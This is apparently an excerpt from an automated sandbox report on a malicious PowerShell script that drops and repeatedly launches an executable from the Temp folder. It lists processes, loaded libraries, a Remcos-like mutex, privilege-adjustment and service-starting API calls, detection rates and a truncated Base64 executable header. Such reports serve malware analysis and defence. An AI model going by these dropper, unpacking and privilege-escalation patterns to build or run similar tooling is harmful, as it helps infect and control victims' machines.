Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

5_2_00417AD9

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0040F5A6 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

5_2_0040F5A6

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

5_2_0041B9AB

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

5_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JXCJKXCJHKJHXCJHKXCXCJHK.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-DJTZHJ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbsijdtq.lbz.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: MKBOY.ps1	Virustotal: Detection: 42%
Source: MKBOY.ps1	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\MKBOY.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: SFSGSEERE.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000000.897574793.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr
Source:	Binary string: SFSGSEERE.pdbXFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000000.897574793.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAB

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: 0xF0861110 [Fri Nov 15 01:40:32 2097 UTC]

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

5_2_0041D0CF

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name: R2K
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name:
Source: RUNPEE.dll.3.dr	Static PE information: section name: 7}~F^E
Source: RUNPEE.dll.3.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004570CF push ecx; ret	5_2_004570E2
